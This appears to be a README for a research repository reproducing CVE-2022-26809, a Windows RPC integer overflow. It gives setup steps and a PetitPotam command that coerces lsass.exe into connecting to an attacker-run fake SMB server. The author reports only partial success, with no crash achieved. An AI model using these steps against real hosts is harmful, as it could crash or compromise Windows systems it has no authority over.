This repo just simply research for the CVE, for more detailed ananlysis,please refer here.
UPDATE:05/19 2022
This ananlyze hasn't been finished yet....
UPDATE:05/22 2022
HuanGMz Post and corelight blog show the real vulnerable point:
OSF_CASSOCIATION::ProcessBindAckOrNak
This vulnerability is triggered like CVE-2021-43893, when send the ESFRPC request to lsass.exe with UNC path, victim will try to access target as client, so it will trigger interger overflow at client API
If have any better solution to trigger this vuln, feel free to submit issue or pr :)
Because the vulnerability triggered like CVE-2021-43893
, just clone the PetitPotam code.
Just prepare environment just like here:
- trigger: with PetitPotam
- victim: with Vulnerable rpcrt4.dll
- attacker: with attacker-server
- Run
fake_smb_server.py
at attacker-server aflter replacing the rpcrt.py wit origin one(**Because the 445 port has been occupied by System on Windows, it recommend to deploy service on linux ** - trigger the victim to access attacker serve with
python petitpotam.py -pipe lsarpc -method DecryptFileSrv -debug "user:password@victim.ip" "\\attacker.path\realfile
- It will not cause BSOD usually, enable the page heap for
lsass.exe
(However, I have not success triggered BSoD, but accroding the windbg, the interger overflow has been triggered)
Old Description
Here is reproduce code for Windows RPC Vuln CVE-2022-26809
, and it refer https://github.com/microsoft/Windows-classic-samples/blob/main/Samples/Win7Samples/netds/rpc/hello.
My python version is 3.6.7
Not sure if GetCoalescedBuffer will involve real CVE-2022-26809, just keep it
the poc.py
just try to trigger the vuln functionOSF_SCALL::GetCoalescedBuffer
, it wouldn't cause any crash because dword integer overflow is too hard to reproduce.And the rpcrt.py
is the python package impacket.dcerpc.v5.rpcrt
,just replace it with origin to trigger vuln(Remember to backup the origin one :) I believe the rpcrt.py
has a huge of bugs).
If it not work, maybe wireshark can help to locate the bug.
if necessary, just use nmake
to rebuild it